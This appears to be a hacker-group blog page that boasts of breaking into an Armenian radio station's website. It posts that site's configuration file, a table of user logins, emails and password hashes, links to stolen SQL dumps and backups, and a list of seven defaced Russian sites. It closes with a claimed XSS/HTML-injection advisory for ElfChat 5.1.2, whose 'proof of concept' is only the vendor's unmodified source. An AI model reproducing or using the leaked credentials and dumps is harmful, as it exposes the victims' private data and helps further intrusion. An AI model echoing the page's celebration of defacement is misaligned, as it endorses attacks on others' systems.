// ========================
// More settings
// Should work fine in most of cases.
// If you don't know, don't change.
// TRUE = enabled / FALSE = disabled
// ========================
$cfg['sqldb'] = 'mysql'; // Type of the database engine.
$cfg['authmode'] = 3; // (1:cookies, 2:sessions, 3:cookies+sessions) default=3
$cfg['redirmode'] = FALSE; // 0 or 1, Set to '1' if you cannot sucessfully log in (IIS servers)
$cfg['xmlclient'] = FALSE; // For testing-purposes only, else keep it off.
$cfg['ipcheck'] = TRUE; // Will kill the logged-in session if the IP has changed
$cfg['allowphp_override'] = TRUE; // General lock for execution of the PHP code by the core
// ========================
// Name of MySQL tables
// (OPTIONAL, if missing, engine will set default values)
// Only change the "sed" part if you'd like to
// make 2 separated install in the same database.
// or you'd like to share some tables between 2 sites.
// Else do not change.
// ========================
$db_auth = 'sed_auth';
$db_banlist = 'sed_banlist';
$db_cache = 'sed_cache';
$db_com = 'sed_com';
$db_core = 'sed_core';
$db_dealers = 'sed_dealers';
$db_articles = 'sed_articles';
$db_vacancies = 'sed_vacancies';
$db_config = 'sed_config';
$db_forum_posts = 'sed_forum_posts';
$db_forum_sections = 'sed_forum_sections';
$db_forum_structure = 'sed_forum_structure';
$db_forum_topics = 'sed_forum_topics';
$db_groups = 'sed_groups';
$db_groups_users = 'sed_groups_users';
$db_logger = 'sed_logger';
$db_online = 'sed_online';
$db_pages = 'sed_pages';
$db_pfs = 'sed_pfs';
$db_pfs_folders = 'sed_pfs_folders';
$db_plugins = 'sed_plugins';
$db_pm = 'sed_pm';
$db_polls = 'sed_polls';
$db_polls_options = 'sed_polls_options';
$db_polls_voters = 'sed_polls_voters';
$db_rated = 'sed_rated';
$db_ratings = 'sed_ratings';
$db_referers = 'sed_referers';
$db_smilies = 'sed_smilies';
$db_shop_category = 'sed_shop_category';
$db_shop_product = 'sed_shop_product';
$db_stats = 'sed_stats';
$db_structure = 'sed_structure';
$db_trash = 'sed_trash';
$db_users = 'sed_users';
$db_ems_zones = 'sed_ems_zones';
$db_ems_tarifs = 'sed_ems_tarifs';
$db_pi_region = 'sed_pi_regions';
$db_pi_cities = 'sed_pi_cities';
$db_pi_pos = 'sed_pi_pos';
$db_pi_streets = 'sed_pi_streets';
$db_news = 'sed_news';
$db_links = 'sed_links';
$db_artists = 'sed_artists';
$db_videos = 'sed_videos';
$db_audios = 'sed_audios';
$db_gallery = 'sed_gallery';
$db_categories = 'sed_categories';
$db_products = 'sed_products';
$db_galleries = 'sed_zgalleries';
$db_galimages = 'sed_zgalleriesentries';
$db_videos = 'sed_videos';
$db_videositems = 'sed_videositems';
$db_zpages = 'sed_zpages';
$db_znews = 'sed_znews';
$db_zalnews = 'sed_zalnews';
$db_ztravelogues = 'sed_ztravelogues';
$db_zevents = 'sed_zevents';
$db_zbb = 'sed_zbb';
$db_zlinks = 'sed_zlinks';
$db_zhelptips = 'sed_zhelptips';
$db_znews = 'sed_znews';
$db_znewsentries = 'sed_znewsentries';
$db_zvotesentries = 'sed_zvotesentries';
$db_zvotes = 'sed_zvotes';
$db_zvacanciesentries = 'sed_zvacanciesentries';
$db_zvacancies = 'sed_zvacancies';
$db_znewsentries = 'sed_znewsentries';
$db_znews = 'sed_znews';
$db_guestgalimages = 'sed_zguestgalleriesentries';
$db_zawards = 'sed_zawards';
$adminmenuarray = array(
'en' => array(
'Settings'=>'admin.php?m=config&n=edit&o=core&p=main',
'News'=>'admin.php?m=tools&p=z_newsedit&a=clp&pid=1',
'Radio news'=>'admin.php?m=tools&p=z_newsedit&a=clp&pid=2',
'New music'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=1',
'Free music'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=2',
'Kitchen'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=3',
'Top10'=>'admin.php?m=tools&p=z_top10edit&a=clp&pid=1',
'VJ voting'=>'admin.php?m=tools&p=z_top10edit&a=clp&pid=2',
//'Guests'=>'admin.php?m=tools&p=z_guestgalleriesedit',
'Staff'=>'admin.php?m=tools&p=z_staffsedit',
'Projects'=>'admin.php?m=tools&p=projectsedit',
'Awards'=>'admin.php?m=tools&p=z_awardsedit',
'Image galleries'=>'admin.php?m=tools&p=z_galleriesedit',
'Questioning'=>'admin.php?m=tools&p=voteedit',
'Runing string'=>'admin.php?m=tools&p=marqueeedit&a=clp&pid=1',
'Banners'=>'admin.php?m=tools&p=z_bannersedit',
'Contacts'=>'admin.php?m=config&n=edit&o=plug&p=z_feedback',
'File manager'=>'pfs.php',
'Constants'=>'admin.php?m=tools&p=z_constantsedit',
'Sitemap Editor'=>'admin.php?m=tools&p=z_sitemapedit',
'Plugins'=>'admin.php?m=plug',
),
'ru' => array(
'Настройки'=>'admin.php?m=config&n=edit&o=core&p=main',
'Новости'=>'admin.php?m=tools&p=z_newsedit&a=clp&pid=1',
'Новости радио'=>'admin.php?m=tools&p=z_newsedit&a=clp&pid=2',
'Новая музыка'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=1',
'Халява'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=2',
'Кухня'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=3',
'Топ 10'=>'admin.php?m=tools&p=z_top10edit&a=clp&pid=1',
'VJ голосования'=>'admin.php?m=tools&p=z_top10edit&a=clp&pid=2',
//'Гости'=>'admin.php?m=tools&p=z_guestgalleriesedit&a=clp&pid=1',
'Сотрудники'=>'admin.php?m=tools&p=z_staffsedit',
'Проекты'=>'admin.php?m=tools&p=projectsedit',
'Награды'=>'admin.php?m=tools&p=z_awardsedit',
'Галереи'=>'admin.php?m=tools&p=z_galleriesedit',
'Опрос'=>'admin.php?m=tools&p=voteedit',
'Бегушая строка'=>'admin.php?m=tools&p=marqueeedit&a=clp&pid=1',
'Баннеры'=>'admin.php?m=tools&p=z_bannersedit',
'Контакты'=>'admin.php?m=config&n=edit&o=plug&p=z_feedback',
'Константы'=>'admin.php?m=tools&p=z_constantsedit',
'Загрузки'=>'pfs.php',
'Страницы'=>'admin.php?m=tools&p=z_sitemapedit',
'Дополнения'=>'admin.php?m=plug',
)
);
$langnames = array(
'en'=>'English',
'ru'=>'Russian',
'am'=>'Armenian',
);
$month_array['en'] =array(
'01' => 'January',
'02' => 'February',
'03' => 'March',
'04' => 'April',
'05' => 'May',
'06' => 'June',
'07' => 'July',
'08' => 'August',
'09' => 'September',
'10' => 'October',
'11' => 'November',
'12' => 'December',
);
$month_array['ru'] =array(
'01' => 'Январь',
'02' => 'Февраль',
'03' => 'Март',
'04' => 'Апрель',
'05' => 'Май',
'06' => 'Июнь',
'07' => 'Июль',
'08' => 'Август',
'09' => 'Сентябрь',
'10' => 'Октябрь',
'11' => 'Ноябрь',
'12' => 'Декабрь',
);
?>
+ rmned!!!
Deleted Files!(not all)
Some Captcha From SQL + Information :
id login password access_level is_active fname lname email country city sex
1 admin 1a1dc91c907325c69271ddf0c944bc72 9 1 Admin Adminyan admin@gmail.com Armenia Yerevan 1
8 admin@a.sds b2ca678b4c936f905fb82f2733f5297f 1 1 Edgar asd admin@a.sds null null 1
5 admin@a.sd 099b3b060154898840f0ebdfb46ec78f 1 1 aaa sdsd admin@a.sd qwe qwe 1
9 root 47bce5c74f589f4867dbd57e9ca9f808 1 1 Edo fdssdf root asd dsa 1
28 q@w.qw 76d80224611fc919a5d54f0ff9fba446 1 1 fg h sgsdfgsg q@w.qw dsf qwe 1
Image :
http://s019.radikal.ru/i641/1207/73/f910dc351654.png
SQL Dumped :
(Test)
http://pastebin.com/x0Xd07Qi
SQL Dumped :
(Radiovan)[Download]
http://www.share.az/mspu1sp9ovw2/radiovansql.txt.html
Backup (Weekly + Daily)
[download] :
http://www.share.az/rdpsb532ibg3/Backup.rar.html
0day by. Avatar Fearless
_____ __
/ _ \___ _______ _/ |______ _______
/ /_\ \ \/ /\__ \\ __\__ \\_ __ \
/ | \ / / __ \| | / __ \| | \/
\____|__ /\_/ (____ /__| (____ /__|
\/ \/ \/
Special Thank`Z To : AkaStep & The Chaos M0M!K
R3SP3CT T0 : ALL MY Bro*S
___ __ _ _ ____ ___ _____
/ _ | ___ / /_(_)______ _______ _ ___ ___ (_)__ _ / __ \/ _ \/ ___/
/ __ |/ _ \/ __/ /___/ _ `/ __/ ' \/ -_) _ \/ / _ `// /_/ / , _/ (_ /
/_/ |_/_//_/\__/_/ \_,_/_/ /_/_/_/\__/_//_/_/\_,_(_)____/_/|_|\___/
More Information Cooming Soon! http://radiovan.am R3FUCK3D!!!
(P.S : pastebin.com/4bC7B6wL)
Sp3C!4L FOr M4NY3T!K :
http://hidemyass.com/files/ziEPK/
Burda arm ip-ləri doludu
məndən istəmişti =)))))))Buda Site-də olan Backup + içində SQL Dump + Şəkil var Shell-dən özünüz daha çox araşdıra bilərsiniz =)
URL : http://www.share.az/rdpsb532ibg3/Backup.rar.html
Və Shell demişkən shell-in çəklin çəkdim =)
Server-də sadəcə iki ədəd site var amma bu siteləri təmizləyəcəm tarixdən
Sayqılarla Avatar Fearless =)
7 Site Defaced
http://stikers-home.ru/fuck.html
https://www.zone-h.org/mirror/id/18224427
http://avtofary.ru/fuck.html
https://www.zone-h.org/mirror/id/18224431
http://bibao.ru/fuck.html
https://www.zone-h.org/mirror/id/18224436
http://77scums.ru/fuck.html
https://www.zone-h.org/mirror/id/18224440
http://lifez.ru/fuck.html
https://www.zone-h.org/mirror/id/18224445
http://tvoi-son.ru/fuck.html
https://www.zone-h.org/mirror/id/18224453
http://acnol.ru/fuck.html
https://www.zone-h.org/mirror/id/18224456
Special Respect To : Bot_25 , Leroy , MetaiZm
& All Anti-armenia.ORG Team member'z
https://www.zone-h.org/mirror/id/18224427
http://avtofary.ru/fuck.html
https://www.zone-h.org/mirror/id/18224431
http://bibao.ru/fuck.html
https://www.zone-h.org/mirror/id/18224436
http://77scums.ru/fuck.html
https://www.zone-h.org/mirror/id/18224440
http://lifez.ru/fuck.html
https://www.zone-h.org/mirror/id/18224445
http://tvoi-son.ru/fuck.html
https://www.zone-h.org/mirror/id/18224453
http://acnol.ru/fuck.html
https://www.zone-h.org/mirror/id/18224456
Special Respect To : Bot_25 , Leroy , MetaiZm
& All Anti-armenia.ORG Team member'z
6 Ağustos 2012 Pazartesi
Elfet - ElfChat 5.1.2 Pro XSS + HTML Inject on Groups.PHP
+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Elfet - ElfChat 5.1.2 Pro XSS + HTML Inject on Groups.PHP
# Date : 2012-08-01
# Vulnearbility : http://www.Site.tld/chat/admin/groups.php?2dfc7807e562134798541dbba20e22e7/YWNydWRfYWN0PWNyZWF0ZQ--
# Author : Avatar Fearless
# Software link : http://community.elfchat.net/files/download/4-elfchat-5-demo/
# Official Site : http://elfchat.net/
# Version : 5.1.2 Pro (Updated)
# Tested on : Windows 7 Ultimate x32
# Original Advisory : http://thefear.in/elfchatvuln3.txt
# Contact : avatar@hiphopfan.com || avatar_legends@live.com/@mail.ru
# Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/
+---------------------------------------------------------------------------------------------------------------------------------------------------+
[+] Vulnerable :
http://www.Site.tld/chat/admin/groups.php
[-] Exploit :
In "Admin" Case you can do everythink with groups.php!
[?] About :
For More Info Contact me.
[#] Description :
It affects to : /admin/index.php + /admin/users.php
[$] Information About This Vulnerability + Exploiting.
You Can Put JavaScript + HTML Inject when you create a new group.
[|]PoC :
<?php
require_once 'init.php';
require_once 'controller/CrudController.php';
require_once 'models/Group.php';
class GroupsController extends AdminController
{
public function __construct()
{
parent::__construct(array(
'select' => 'groups',
'title' => tr('Groups'),
'url' => 'groups.php?'
));
$this->view = new View('groups');
}
public function action_index()
{
$groups = Group::model();
$crud = new CrudController($groups);
$crud->SetController($this);
$crud->SetLog($this->logs);
$crud->SetLogsMessages(array('create' => tr('New group was created: %title%'), 'update' => tr('Group was edited: %title%'), 'delete' => tr('Group was deleted: %title%')));
$crud->SetSubmits(array('create' => tr('Add new group'), 'update' => tr('Edit group'), 'delete' => tr('Delete group')));
$crud->SetTitles(array('create' => tr('Create new group'), 'update' => tr('Edit group: %title%'), 'delete' => tr('Delete group: %title%')));
$crud->SetMessages(array('create' => tr('New group was created.'), 'update' => tr('Group was edited: %title%'), 'delete' => tr('Group was deleted: %title%')));
$act = $crud->GetAct();
$page_title = '';
if ($act == CrudEnum::Read)
$page_title = tr('Groups');
$this->view->title = $page_title;
$columns = array(
'id' => array('title' => tr('ID'), 'width' => '20px'),
'title' => array('title' => tr('Title'))
);
$crud->SetColumns($columns);
$title = new InputText('title', tr('Title of new group.'));
$title->SetValid(array( new Validation_NotEmpty(), new Validation_MaxLength() ));
$title->AddValid (new Validation_Unique($groups, 'title', tr('Title of group have to be unique.')));
$crud->AddInput($title);
$crud->AddInput(new InputCheck('settings#enter', tr('Can enter to chat?'), true));
$crud->AddInput(new InputText('settings#icon', tr('Icon of group'), ''));
$crud->AddInput(new InputCheck('settings#bbcode_status', tr('Can use bbcode in status?'), false));
$crud->AddInput(new InputCheck('settings#enable_antispam', tr('Turn on antispam?'), true));
$crud->run();
$this->display();
}
public function action_reset()
{
$group_settings = array(
'enter' => true,
'icon' => '',
'bbcode_status' => false,
'enable_antispam' => true
);
Group::model()->updateAll('', array(
'group_setting' => serialize($group_settings)
));
$this->logs->Log(tr('All groups was reseted.'));
$this->redirect(url( array('message' => tr('All groups reseted.')) ));
}
}
$page = new GroupsController();
$page->Login();
?>
[@]
Respect To :
All My Bro*S
AA Team
MF Team
MKT Team
Gr33t`Z T0 : All Team MemBer'Z
+---------------------------------------------------------------------------------------------------------------------------------------------------+
Kaydol:
Kayıtlar (Atom)